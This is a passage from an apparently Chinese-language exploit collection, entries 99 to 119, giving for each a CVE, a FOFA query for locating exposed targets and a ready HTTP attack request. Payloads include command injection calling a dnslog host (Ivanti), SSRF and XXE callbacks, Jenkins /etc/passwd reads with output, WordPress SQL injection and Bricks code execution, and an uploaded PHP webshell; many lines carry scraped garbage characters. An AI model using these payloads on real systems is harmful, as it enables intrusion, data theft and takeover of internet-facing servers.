. T( l- m U+ P" o6 E( b K/ OAccept-Encoding: gzip, deflate
, {. ~5 o. O. w* W. k2 Y, n+ HAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
: r t4 o8 Y0 f/ T/ d& a6 FContent-Type: application/x-www-form-urlencoded; charset=UTF-8! D; W& \3 }; p$ R* p
X-Requested-With: XMLHttpRequest
5 s. x% T; i# n9 v) s( {
' ?. {# o/ ]% u# r, C4 f6 Cid=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B$ ?5 L9 A/ l- ~) {
' I. q, \& j; O! S, H/ j$ k, V
$ ^: f* \ O$ j4 d99. Ncast盈可视高清智能录播系统busiFacade RCE
& t/ A7 W3 W- }; U+ n) e" y5 QCVE-2024-0305
' e; M6 s2 b5 s' z4 iFOFA:app="Ncast-产品" && title=="高清智能录播系统"8 ?# G' r& u% d' o- ~- z
POST /classes/common/busiFacade.php HTTP/1.1! a C% M' H8 W3 n/ M) ]2 L
Host: 192.168.40.130:8080
8 C5 w, k `, z, E0 KUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0" W( _6 R$ |) l# `
Connection: close/ I' i& @! c4 J9 S$ Y$ t' F6 U
Content-Length: 1543 w& t* E8 t( Q# J8 c- S
Accept: */*
# d$ r _) {( y; C$ L4 b; ?. qAccept-Encoding: gzip, deflate5 B/ D6 X( s! `7 l
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+ D: J) P9 q) |( R5 t# u" MContent-Type: application/x-www-form-urlencoded; charset=UTF-8
7 R' i9 p4 j! T1 AX-Requested-With: XMLHttpRequest" e' H2 f3 U+ J' Y- x
/ U6 g [6 N) h8 C6 t
%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D( T* U8 i/ o( ?
0 u2 e, c, @1 S! a' y2 E' X. v* A6 k' ^- A
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传 A/ O; F" c# Y0 h: _' l
CVE-2024-0352
& E1 g' R& `* m+ _FOFA:icon_hash="874152924"
/ i# Q; [1 X& ^) f$ e" O% TPOST /api/file/formimage HTTP/1.1
% S1 i K' S% ?# |, i" oHost: 192.168.40.1300 W# D" x1 q1 j7 n
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36/ Y' X+ w2 u2 t. v
Connection: close$ U7 \) B" L6 s$ @: q
Content-Length: 201+ n A8 t* M& z3 [, U
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
; v! K5 \) b7 S8 fAccept-Encoding: gzip
* V6 F; K: M! T6 y' v7 h' e2 t& e2 C- A2 @4 c
------WebKitFormBoundarygcflwtei/ M" a" E% o+ m/ B0 Y2 C
Content-Disposition: form-data; name="file";filename="IE4MGP.php") _) T* A6 f; Z7 ~
Content-Type: application/x-php
5 H: V6 U* c6 F( I; D. g* F$ o% o3 L7 @
2ayyhRXiAsKXL8olvF5s4qqyI2O) X; z! n. D0 C- M @
------WebKitFormBoundarygcflwtei--
' v5 q* o8 @, I' O9 M" M& U% Z8 ~: q, M- L) c6 ]) v( K" G& f
7 S, G1 V! S5 d X, L
101. ivanti policy secure-22.6命令注入
9 U" i# ~3 P8 I7 U6 l8 j. v f% ICVE-2024-21887
& \& v5 _! r- CFOFA:body="welcome.cgi?p=logo"0 h! \; B6 z8 u" p+ Y: ~3 z
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
# m: D5 m F8 {8 J" q9 n. kHost: x.x.x.xx.x.x.x/ w) t8 O8 o" @4 w& u3 W. }
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36& T% ~! Y( V! r M
Connection: close
$ Z5 e4 B, ^' _* t9 y7 `9 O4 T9 oAccept-Encoding: gzip7 Q$ O7 f7 j* J
0 E! L! R a3 n: J
# f7 P3 b4 I Z: [ B6 r102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行- h8 G2 O) e2 g
CVE-2024-21893& y N1 k! U x/ G& R2 Z( [
FOFA:body="welcome.cgi?p=logo" v$ ^$ d) Q; t) h
POST /dana-ws/saml20.ws HTTP/1.1
8 x' N1 A* p- \- g |Host: x.x.x.x/ g; w1 E& h! w/ {7 d) g
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36% S" w* e- t# ~( A
Connection: close' h. ]& W! u2 t5 }) W# Y
Content-Length: 792& ?; T: r3 `! Y+ \: \
Accept-Encoding: gzip ^# Q, N! z) U0 N
' o. z7 j# s# P0 S
<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>4 F+ A5 @ {8 C7 q! `5 w
. s) \! O% m$ i' b9 o* N3 s
103. Ivanti Pulse Connect Secure VPN XXE
- c6 \; c& n+ m9 u" ~1 @CVE-2024-220245 Q$ W! [" v# w9 y
FOFA:body="welcome.cgi?p=logo"
% \7 }# W0 S+ `8 C+ wPOST /dana-na/auth/saml-sso.cgi HTTP/1.1; H( j) C$ |( z, q
Host: 192.168.40.130:111! ?6 V; N, W, [, N
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
3 @" Q2 t3 u/ L# m; H2 ]Connection: close# K5 E) q7 _& r1 W) F
Content-Length: 2042 g# [2 h8 N8 j! d2 U
Content-Type: application/x-www-form-urlencoded
/ g: L8 E+ W% w, [Accept-Encoding: gzip( `' E' v' {' ~* H2 w
) S3 c9 ~6 A2 D
SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==8 u' `% V: Q- b0 ]3 b% C$ }
& A7 K" u8 c: _; F5 O
# p7 W* }/ s- X/ a( I" X
其中SAMLRequest的值是xml文件内容的base64值,xml文件如下
/ p- C2 ~* b6 h8 G<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>7 S* X& n3 `* f2 `
) M8 _+ s- q: O" j
' A! `- ?# D4 i8 i3 e3 }3 ?104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露, i4 U- H8 r H/ X0 z! f/ N- \
CVE-2024-0569+ L9 [5 A- R. y) B) \
FOFA:title="TOTOLINK"
! Y9 q+ o( e0 EPOST /cgi-bin/cstecgi.cgi HTTP/1.16 j7 ^/ k& E! Y* t' m+ ?
Host:192.168.0.1
~3 t h# x) o! A. x4 \- T) a. JContent-Length:41% g& U2 d- L4 c) s
Accept:application/json,text/javascript,*/*;q=0.01
0 c+ R' L! }9 u2 fX-Requested-with: XMLHttpRequest+ C7 o0 H2 Y: |. a
User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36
2 ?8 U# F% N8 G) P: n. @Content-Type: application/x-www-form-urlencoded:charset=UTF-81 H, H/ z V+ j/ _& N
Origin: http://192.168.0.1
, k& `! `1 q6 n: ?Referer: http://192.168.0.1/advance/index.html?time=1671152380564
% h. m5 H, A- jAccept-Encoding:gzip,deflate5 ], C' T' m' ~; H' J# X+ R
Accept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7- l- d" W: Z m$ B3 v! {
Connection:close! e7 C5 u$ {/ ~& S- Y5 V
% X% i% M4 r6 \
{- C* g' R& e I0 M% e' g/ x8 X
"topicurl":"getSysStatusCfg",: y; C+ k3 H& n5 p7 o' P6 }* |
"token":""+ s. q9 q: m" l% j i0 s; V
}* S) ]) b6 i) F, }3 f
: X5 M! I# f; l) `. ]105. SpringBlade v3.2.0 export-user SQL 注入$ L" O- P/ o, a. T, k4 ~
FOFA:body="https://bladex.vip"4 z6 k+ j" u, _+ h/ r/ s
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1
( P: f. h. Y1 z6 C4 p O( b
# _5 w! {$ B& N106. SpringBlade dict-biz/list SQL 注入- { f" k* S! t+ M: ~+ a3 k0 F
FOFA:body="Saber 将不能正常工作"
. p* f, l _& j/ \$ G. F8 pGET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.12 O; E5 Q+ t/ C6 M2 E8 w" L
Host: your-ip
3 q$ X- ?0 f9 ]# l* F& _User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" b9 W8 A8 Z" B9 u6 `) X
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A% t5 N$ H# c' [' x" {0 c9 a5 n9 |
Accept-Encoding: gzip, deflate% ]; h2 o# {* U
Accept-Language: zh-CN,zh;q=0.9- H9 h& \: @: v. C8 C& }% ~
Connection: close
! ^, ]* C% p4 p* y* i; b
6 a2 h* I) L9 `( Y+ h. `' ?/ D- \/ E
107. SpringBlade tenant/list SQL 注入# N: f! y9 U D5 t0 s
FOFA:body="https://bladex.vip"
9 u8 w$ O) @4 y1 n% q3 P/ G6 S; b, |GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.14 v- k: U0 Z; {' p! S
Host: your-ip1 h: r+ l% [7 H- V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
' Q* a9 e @2 [# r8 yBlade-Auth:替换为自己的
6 ~' m9 P3 o) r4 D% ]$ _Connection: close _2 ^ w9 @$ l- s
) I. ]2 G# T6 D0 i9 Y
- o# n! Y" |3 l0 A/ n108. D-Tale 3.9.0 SSRF
$ s: e1 [0 J, I7 F/ DCVE-2024-21642
# Z; Y# \; w0 X: L. hFOFA:"dtale/static/images/favicon.png"7 `# I$ v" w0 o8 m/ l. s
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
' S0 m4 m* K7 B9 l# k; WHost: your-ip5 t& J+ b' V, a/ g5 l3 ^
Accept: application/json, text/plain, */*
3 u; m) W5 I% y0 l; FUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
+ U6 W6 L' V* pAccept-Encoding: gzip, deflate- j! ]# Q/ R* Y, G- [: v
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
4 b" w7 }. E B V- ]Connection: close# O T+ \' o9 U: X7 H5 g
2 ~4 }0 ]) X* Q8 Z( |% s2 ^8 ]6 y7 v% a/ F, S5 O
109. Jenkins CLI 任意文件读取, O5 b Z) Y2 K9 A( Q$ [4 V9 h! c
CVE-2024-23897
8 ]9 I3 [5 c, K, jFOFA:header="X-Jenkins": X5 A( Y: P; B
POST /cli?remoting=false HTTP/1.1" I0 q! U7 z+ C8 z" w5 `, x
Host:
& c5 E3 i* j- ~3 x! N; uContent-type: application/octet-stream* e6 D4 G* w. D$ O' d- n7 y% z
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92; V0 m7 C) }/ p, q& P9 Y
Side: upload1 l4 ?; T+ ]$ Y! B
Connection: keep-alive' }& e, Y$ l- v* R& H$ W& R( z
Content-Length: 163- V' h$ u# d+ }
: s d! _* M2 o7 X+ T; hb'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'
2 _- D( Y9 x' }6 \
3 p+ n6 t \1 N5 |
% ?$ A6 U3 B3 ?# P8 V# f- p) f. CPOST /cli?remoting=false HTTP/1.1
* q# w3 Q5 d: \. `4 RHost:
% x8 N S, E* z+ k% j; PSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92# [, t+ g1 j5 Y! m7 l9 J& J5 A
download
E: j- f( \" U% QContent-Type: application/x-www-form-urlencoded
8 p2 O+ D5 e7 b# b" VContent-Length: 0
8 k4 v& Y+ S8 M4 [+ @! s' f1 E, T; r
5 W: @) I4 K4 c
9 ~# \" X% N8 b3 N2 BERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin& Y0 j1 e" |8 \( J" T5 a! E5 g
java -jar jenkins-cli.jar help
+ U$ \0 z+ e' B! X9 ~$ @[COMMAND]4 T' P9 f( `- _: _. C
Lists all the available commands or a detailed description of single command.: ^) B' Y' K c6 y; @' w
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)
" `0 N, J3 J9 @! ]3 T: e' Z( o
O. i! P+ j& Z# [2 K3 C1 K* }9 ^6 \6 X$ x4 o5 Z6 @3 ?
110. Goanywhere MFT 未授权创建管理员$ V& _. k. A' \# ~
CVE-2024-0204% H% B6 C+ f7 }8 C( w4 F' I' K/ o
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
4 |' ]* q% q; Y6 `( BGET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
5 c _- p+ |! ~" jHost: 192.168.40.130:8000
% K" l7 Y) `& yUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36" j/ d# ~: M0 f/ l
Connection: close+ Q( | X6 }5 \+ `- y3 H# m
Accept: */*
8 s2 f# f/ V1 |" i# M0 VAccept-Language: en
7 M$ D; W% }4 ]* N" Z7 d" H% ]Accept-Encoding: gzip1 C% [! g. X' b* o R3 X
( M" x+ y% E A
. i2 s* j+ t( I4 N: j6 \111. WordPress Plugin HTML5 Video Player SQL注入
: f. E% Z% {% n$ Q. ^CVE-2024-1061, |/ N' @& H# U2 z& r X0 Y
FOFA:"wordpress" && body="html5-video-player"5 x, k! @7 T# `5 u8 B: I: ~
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1( A0 P. L6 a) O9 P- \
Host: 192.168.40.130:112
, v/ C. @; ?5 s8 Y) V% RUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
0 P& \; {% I+ T& n _, C5 YConnection: close4 i# _! N2 l1 a
Accept: */*0 s/ T Y4 [5 K1 ]- X
Accept-Language: en& }! b! A& w8 b4 p4 I5 B! p
Accept-Encoding: gzip$ v |, a: r' I2 d
, V1 [$ U* W: _; J
) h4 ]$ j4 D4 N' ]112. WordPress Plugin NotificationX SQL 注入3 r+ S( X! u4 h" n& j* L+ N
CVE-2024-1698$ f2 n- p* t; w1 i' y/ X
FOFA:body="/wp-content/plugins/notificationx"
- u+ N; J. Y% @( B- c# A4 APOST /wp-json/notificationx/v1/analytics HTTP/1.1 b z/ a. f5 Z* }1 {' j8 U( ]
Host: {{Hostname}}- c _5 V+ r! Z# |; U! b1 v# c
Content-Type: application/json2 y6 t) A* b" ]# I
( k( I- g- }3 s7 |* S- D
{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}, n1 Y' u% c; j9 l& U
) y* s' b$ C5 h4 Q+ R. \
6 t/ j. |- c, ]5 [: k$ R: ^: W113. WordPress Automatic 插件任意文件下载和SSRF( V+ l, E2 z" l* w
CVE-2024-27954
4 y; `0 a+ F! U, J( q% {7 u9 GFOFA:"/wp-content/plugins/wp-automatic"
! L% v* f4 I+ G8 \ S% H' SGET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
9 n# h' m r- u, U7 v1 m8 g0 g0 WHost: x.x.x.x
# S+ a# v* U2 Q2 JUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.365 V$ w' e7 z! ~, I1 U5 p) L
Connection: close
/ G% f5 q6 x7 GAccept: */*1 w6 t. Z* p# c$ K
Accept-Language: en
. m( X6 m' L3 ^3 @8 M: k& i6 h& hAccept-Encoding: gzip
; z7 O) K' Z( s. A |- k1 @+ e
( [% r9 ]$ C1 \4 R8 O
) K: r3 ~8 B6 |' \0 U/ s114. WordPress MasterStudy LMS插件 SQL注入
1 B' E: u2 T0 U! aFOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
0 G6 Y2 e7 H: c. l. }GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.11 E$ I4 y d( b6 O" `
Host: your-ip s8 n: E2 @' Q
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36$ _0 ?! i( G1 }" Q2 T0 f6 O
Accept-Charset: utf-87 B2 P& C+ b5 M. R& O: t
Accept-Encoding: gzip, deflate
^) O$ s( B" ?- |1 x& e/ i9 o5 OConnection: close1 H7 I4 H: {: r$ N! `6 i n
7 J. \0 d7 ]: o& |) C; i
* Q! s% e& w H+ @) H/ c* o115. WordPress Bricks Builder <= 1.9.6 RCE) D5 g2 P' o" M$ z& ]- q5 @
CVE-2024-25600- I7 t, E0 @! I; X* j1 f
FOFA: body="/wp-content/themes/bricks/"
# w8 }% A" H9 `) O$ M第一步,获取网站的nonce值
* y/ Y$ M1 g6 Q$ T9 YGET / HTTP/1.1
. k2 ~6 s6 F! I9 E. QHost: x.x.x.x) @7 {1 T) ^# n0 o8 @
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
3 x% Z! e8 w* _: |Connection: close
5 a/ F; A2 U3 b9 n q& f7 Z) i: ?0 JAccept-Encoding: gzip% P- w+ G0 j* }( r
$ G# H2 _$ i$ T' x% v9 h- Q# `4 k5 N
& z( M7 g2 U+ W; c1 U4 v, C第二步替换nonce值,执行命令7 j+ ^$ x9 X F2 y9 M3 h; P) s
POST /wp-json/bricks/v1/render_element HTTP/1.1
1 l& W' H1 e% |6 r' Y4 PHost: x.x.x.x$ w" I; T0 b4 x' ]' `7 |9 A
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
" F0 E. e( v. E9 j% u) L" uConnection: close
4 B. e3 |2 w+ UContent-Length: 356. V& B" Z# I' F# U/ M
Content-Type: application/json$ Q; j2 p% B! q% A: K
Accept-Encoding: gzip5 l. v7 B. P' ^, s% G0 N$ F3 }
$ D7 _: U, G+ F8 U ^{: D( ?: ^1 K+ p" H9 h; ]0 p
"postId": "1",: j' Z- R8 Y& S/ M: J
"nonce": "第一步获得的值",
+ `5 x( y, U: n "element": {. h& z& H5 b# m5 k: f% G6 l
"name": "container",+ ~- d6 M7 b7 I) C
"settings": {
, i* E# E$ W- F3 r3 t "hasLoop": "true",
' D6 ]# z! J I' Y8 G "query": {
# |5 p$ W, y! U- W "useQueryEditor": true,
a2 ~6 q" V; p7 o, E+ d "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",' ^' d& v3 j U: Z3 W0 J
"objectType": "post"
+ P( W+ _$ b x/ E0 A& R }& x! u v; ]& ]7 L
}
# {# [1 r# O' P5 r) P }
0 a1 p; }- r* i" h1 Z, @. I$ v}8 T5 y9 p. A! D
% J$ }, o2 K7 @9 z- B+ n1 n+ z% s: t+ x6 V7 [
116. wordpress js-support-ticket文件上传" x; l( f! }7 w1 n) c/ w* g
FOFA:body="wp-content/plugins/js-support-ticket"
! Z) E2 ]0 V! f0 i* W: e7 ^2 X z$ TPOST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
: R( x5 x0 p/ m* _+ o( j1 L+ J) sHost:
* L: b, P. }' XContent-Type: multipart/form-data; boundary=--------7670991714 Q: R5 t( d- d- Z% p
User-Agent: Mozilla/5.0
, P% q% b' a4 {. B9 m" I# i+ x* L6 m& W9 ~) E z3 g# E3 [
----------767099171
0 E; c7 {, N0 G" y) gContent-Disposition: form-data; name="action"
1 h5 A0 F2 V1 j( Iconfiguration_saveconfiguration
& D! I9 F' Y3 @1 W% b----------7670991715 a$ ~" |" \/ F- D- N- A
Content-Disposition: form-data; name="form_request"
. y& M7 y5 h# b- m; C8 C/ pjssupportticket
( k8 _1 {! o6 w/ j----------7670991718 E1 s3 k# f, i( }, _% o
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"& {/ f1 Y7 K' d/ h3 m9 x
Content-Type: image/png
1 \4 L7 I T+ T4 ^0 \----------767099171--! f# U" ?( q8 u' A _7 e3 X2 `
; N+ z: ] a/ t' ?
c$ y+ o+ F1 v/ q/ e* C& {" L. q117. WordPress LayerSlider插件SQL注入2 b/ _9 B4 c7 |5 ?) Q3 p
version:7.9.11 – 7.10.0, K# g/ i# ` ~6 T! s
FOFA:body="/wp-content/plugins/LayerSlider/"
7 Y L/ y) X, o+ O! oGET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1" H: V+ ^' t7 @5 r3 R. m
Host: your-ip
* g% A/ E6 w8 ]2 X% zUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
8 ~8 J$ J0 S9 f! GAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
/ x* P1 c# W9 E pAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.26 q" M4 C4 [4 f0 O, _4 s6 Q
Accept-Encoding: gzip, deflate, br
1 w" Y. p! `# y& I9 f' WConnection: close0 K: Q$ c7 ]* \. `6 J4 _
Upgrade-Insecure-Requests: 1& X& W$ ?2 m. j2 ~9 L. ~5 W
. R7 F( w+ W) [3 ?/ E
# `" ^% s7 `2 N$ x* D+ V
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传$ x: y7 `1 _2 j! ]
CVE-2024-0939
+ S4 G% `9 j8 D/ O5 g" sFOFA:title="Smart管理平台"
, p. ?; K( `* e% z5 u+ xPOST /Tool/uploadfile.php? HTTP/1.1& Q2 m7 c6 i" x2 U7 J' ?
Host: 192.168.40.130:8443
: ?$ j+ Q3 E1 _# t# @) tCookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8; A0 K7 k3 W8 r% j. A; \& }
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.04 a5 {! t' m: G. \
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
* i5 P3 T; w. l' GAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.24 r4 A7 K' Y( Y, F
Accept-Encoding: gzip, deflate
3 B. |6 V3 Q& xContent-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887" E- g& s) ^# B- J( O, n1 @
Content-Length: 4059 L7 h* ?2 Q7 f# Q
Origin: https://192.168.40.130:84437 n8 `7 M, \. Y* y% Z! Z% t3 i
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
) a' Z, r2 G" f5 g2 V8 h6 ~Upgrade-Insecure-Requests: 1
1 `2 N' s5 W8 M5 }) W+ l, {' B* bSec-Fetch-Dest: document
4 h* k" u) _0 e8 s, d- E0 {Sec-Fetch-Mode: navigate$ x4 t9 b. E J0 u) C
Sec-Fetch-Site: same-origin
( D) L" c& `# ^8 Q( s* r# Q# bSec-Fetch-User: ?1
# F, C: v5 L* e" }, _Te: trailers) _1 m7 ^" C! ? Q+ i. R
Connection: close
8 A- P9 B, f5 P( B8 M9 L! r5 ^
2 I m4 a( @5 y9 y" g3 q0 } D-----------------------------13979701222747646634037182887
( l: t6 l& |% q' t( j, [Content-Disposition: form-data; name="file_upload"; filename="contents.php"
0 u7 ^# n! C7 ?2 V% \Content-Type: application/octet-stream
) {+ M" d2 M* w" z
8 M% H7 p9 L; `) V8 S: v9 r* u<?php d) \6 |2 G4 h) B9 L7 c3 {" b
system($_POST["passwd"]);6 t9 [2 K& R- u% ]& [
?>" l0 Q' n. J( c# p. D
-----------------------------13979701222747646634037182887
' E+ z5 ?) q" Z% D; K! s" ~6 {Content-Disposition: form-data; name="txt_path"
3 o# |6 b9 [( N- k
, e8 L8 H: W& k/home/src.php# R0 ~' D7 H6 I K8 X. A0 `
-----------------------------13979701222747646634037182887--2 l1 b. f4 [! g# @4 _7 t
1 i) ~7 H& Z+ q. K
& X% _1 @& L8 V; ~
访问/home/src.php
6 A9 W- P( h Q0 Q3 V
( Z% O7 b) x* f' [, V6 @/ a119. 北京百绰智能S20后台sysmanageajax.php sql注入: h: C6 s! Q5 W8 G: ?, ?
CVE-2024-1254
8 C' D# t3 a2 r; t4 C9 n4 y2 e, ]FOFA:title="Smart管理平台"
% `5 ~0 `& T. j3 |3 a! S Y先登录进入系统,默认账号密码为admin/admin
" _/ t. h$ e7 W$ hPOST /sysmanage/sysmanageajax.php HTTP/1.11
1 m; \7 g0 f! g8 mHost: x.x.x.x: P, ^* a6 d, ^! R
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
! G3 \3 _' c0 Q5 p) Q' X5 t0 GUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
0 b2 g& L# j) V- OAccept: */*
, |$ N& |+ {: H2 J9 m8 ZAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
0 E3 Z& R$ a- I! W7 c% ?5 ~1 r8 A7 p7 wAccept-Encoding: gzip, deflate7 x O. w' n G( w' v! p, ?) ~
Content-Type: application/x-www-form-urlencoded;; f( z! {' y* \" N6 E
Content-Length: 109
2 F5 G" N+ s& n& tOrigin: https://58.18.133.60:8443) z2 m; F5 `6 d3 l4 w( W
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
x& J. r, Y; l: @: \' x, [! dSec-Fetch-Dest: empty* f! V$ y( @5 H3 X! K
Sec-Fetch-Mode: cors
* w- p0 | |7 E6 pSec-Fetch-Site: same-origin
0 G5 X! ^9 N* ]' b3 n5 W8 e5 UX-Forwarded-For: 1.1.1.1
. i7 P5 ^+ W; Q: y/ @* I& B' K2 DX-Originating-Ip: 1.1.1.1
% m6 U. r: @2 H$ N0 R: IX-Remote-Ip: 1.1.1.1
$ N) ~; }. s/ U4 [6 p VX-Remote-Addr: 1.1.1.1
' r6 J& H7 F( i* F7 hTe: trailers$ W7 M( z% w+ n. Y' | j
Connection: close
